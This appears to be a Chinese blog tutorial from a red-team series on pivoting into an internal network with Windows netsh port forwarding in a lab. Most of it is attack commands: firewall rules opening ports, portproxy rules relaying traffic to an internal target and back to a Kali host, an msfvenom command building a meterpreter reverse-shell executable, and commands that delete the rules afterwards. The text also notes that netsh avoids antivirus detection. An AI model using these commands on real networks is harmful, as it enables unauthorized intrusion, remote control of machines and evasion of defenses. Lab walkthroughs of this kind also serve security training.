红队渗透-内网穿透-netsh穿透内网反弹shell

声明:本文仅限于技术交流,请遵守网络安全法,否则后果自负。

0.实际操作视频,请移步

https://www.bilibili.com/video/BV1Uv4y1R7vq/

1.netsh简介

netsh 是Windows系统自身提供的网络配置命令行工具,所以具有免杀的效果

使用前提:administrator权限

2.环境和拓扑图:

2.1环境

kali 网卡1 桥接 192.168.1.6

跳板机win7 网卡1 桥接 192.168.1.8  网卡2 仅主机10.10.10.7

目标及 win2012 网卡1 仅主机 10.10.10.13

跳板机win7开启防火墙(域、工作组和外网等都开启防火墙),仅仅80端口对外网开放

netsh advfirewall firewall add rule name="Site" dir=in action=allow protocol=TCP localport=80

查看防火墙

netsh firewall show state

查看netsh规则

netsh interface portproxy show all

2.2.拓扑图

3.渗透内网步骤

3.1.获取跳板机webshell,上传exe木马,反弹到kali

3.2跳板机上添加防火墙规则,允许外网访问跳板机tcp协议1616端口

netsh advfirewall firewall add rule name="shiliu" dir=in action=allow protocol=TCP localport=1616

3.3添加跳板机的netsh规则把跳板机外网ip192.168.1.8的1616端口映射到内网10.10.10.13的8080端口

netsh interface portproxy add v4tov4 listenport=1616 connectaddress=10.10.10.13 connectport=8080

3.4访问目标机器

http://192.168.1.8:1616/bluecms/uploads/

3.5获取目标机器的webshell

3.6跳板机上添加规则转发跳板机的16161端口的流量到外网kali192.168.1.6的16161端口上

netsh interface portproxy add v4tov4 listenport=16161 connectaddress=192.168.1.6 connectport=16161

3.7制作木马反弹流量到跳板机内网ip10.10.10.7的16161端口上,然后再通过跳板机转发到kali

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.10.7 lport=16161 -f exe -o 16.exe

3.8跳板机的防火墙添加允许TCP16161端口进栈

netsh advfirewall firewall add rule name="16" dir=in action=allow protocol=TCP localport=16161

3.9删除规则

netsh advfirewall firewall delete rule name="shiliu"

netsh advfirewall firewall delete rule name="16"

netsh interface portproxy delete v4tov4 listenport=1616

netsh interface portproxy delete v4tov4 listenport=16161

©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

相关阅读更多精彩内容

友情链接更多精彩内容